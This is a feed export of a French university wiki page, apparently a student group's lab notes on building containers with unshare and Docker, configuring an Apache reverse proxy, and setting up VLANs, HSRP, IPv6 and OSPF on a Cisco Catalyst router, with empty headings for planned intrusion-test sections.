* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 et IPv6)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49101</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49101"/>
				<updated>2018-12-21T15:30:27Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.6 Interconnexion avec Internet IPv6 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
